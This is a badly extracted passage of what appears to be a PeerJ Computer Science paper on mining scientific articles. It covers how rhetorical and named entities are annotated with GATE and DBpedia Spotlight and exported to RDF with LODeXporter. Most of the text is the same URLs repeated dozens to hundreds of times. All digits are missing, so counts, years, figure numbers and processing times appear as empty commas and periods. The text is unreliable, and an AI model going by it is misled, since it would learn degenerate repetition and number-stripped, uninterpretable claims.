http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://www.semanticsoftware.info/rhetector http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.dbpedia.org http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://spotlight.sztaki.hu/downloads/ http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://www.semanticsoftware.info/lodtagger http://dx.doi.org/ . /peerj-cs. figure the figure above shows jape rules (left) that are applied on a document’s text to extract a contribution sentence. the image on the right shows the generated annotations (deictic, metadis- course and rhetoricalentity), color-coded in gate’s graphical user interface. figure the figure above shows a json example response from spotlight (left) and how the detected entity’s offset is used to generate a gate annotation in the document (right). annotation, with a dbpedia uri as its feature, to the document. to further filter the resulting entities, we align them with noun phrases (nps), as detected by the munpex np chunker for english. the aligning is performed using a jape rule (dbpedia ne filter multi-lingual noun phrase ex- tractor (munpex), http://www. semanticsoftware.info/munpex in fig. ), which removes dbpedialink annotations that are not nouns or noun phrases. similarly, we discard nes that include a pronoun only. lodexporter: knowledge base population we now have res and nes detected in the source documents, but they come in a gate-specific data structure, i.e., gate annotations. in order to export them into an interoperable, queryable format, we developed lodexporter (http://www. sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://dx.doi.org/ . /peerj-cs. figure example rules, expressed in rdf, declaring how gate annotations should be mapped to rdf for knowledge base population, including the definition of lod vocabularies to be used for the created triples. semanticsoftware.info/lodexporter), a gate plugin that uses the apache jena (http:// jena.apache.org) framework to export annotations to rdf triples, according to a set of custom mapping rules that refer to the vocabularies described in ‘semantic representation of entities’ (cf. table ). the mapping rules themselves are also expressed using rdf and explicitly define which annotation types have to be exported and what vocabularies and relations must be used to create a new triple in the knowledge base. using this file, each annotation becomes the subject of a new triple, with a custom predicate and its attributes, such as its features, as the object. the example annotation mapping rules shown in fig. describe export specifications of rhetoricalentity and dbpediane annotations in gate documents to instances of sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://jena.apache.org http://dx.doi.org/ . /peerj-cs. figure example rdf triples generated using our publication modeling schema. the rdf graph here represents the rhetorical and named entities annotated in a document, shown in figs. and , created through the mapping rules shown in fig. . rhetoricalelement and linkednamedentity classes in the sro and pubo ontologies, respectively. the verbatim content of each annotation and the uri feature of each dbpediane is also exported using the defined predicates. finally, using the relation mapping rule, each dbpediane annotation that is contained within the span of a detected rhetoricalentity is connected to the re instance in the knowledge base using the pubo:containsne predicate. ultimately, the generated rdf triples are stored in a scalable, tdb-based triplestore. an example rdf graph output for the mapping rules apache tdb, http://jena.apache.org/ documentation/tdb/ from fig. is illustrated in fig. . evaluation we use three open-access corpora in our experiments: . the sepublica corpus contains documents from the proceedings of the semantic publishing workshops from to . semantic publishing workshop (sepub- lica), http://sepublica.mywikipaper.org/ drupal/ . peerjcompsci is a collection of open-access papers from the computer science edition of the peerj journal. peerj computer science journal, https:// peerj.com/computer-science/ . az is a collection of conference articles in computational linguistics, originally curated by teufel ( ). argumentation zoning (az) cor- pus, http://www.cl.cam.ac.uk/∼sht / az corpus.html the documents in these corpora are in pdf or xml formats, and range from to pages in various formats (acm, lncs, and peerj). we scraped the text from all files, analyzed them with our text mining pipeline described in the ‘implementation’ section, and stored the extracted knowledge in a tdb-based triplestore. the generated knowledge base is also available for download on our supplements page, http://www. semanticsoftware.info/semantic- scientific-literature-peerj- - supplements quantitative analysis of the populated knowledge base table shows the quantitative results of the populated knowledge base. the total number the table is automatically generated through a number of sparql queries on the knowledge base; the source code to reproduce it can also be found on our supplementary materials page, http://www.semanticsoftware.info/ semantic-scientific-literature-peerj- -supplements of rdf triples generated is , , . on average, the processing time of extracting res, nes, as well as the triplification of their relations was . , . and . seconds per document for the peerjcompsci, sepublica and az corpus, respectively; with the dbpedia sateli and witte ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://jena.apache.org/documentation/tdb/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ http://sepublica.mywikipaper.org/drupal/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ https://peerj.com/computer-science/ http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.cl.cam.ac.uk/~sht /az_corpus.html http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements 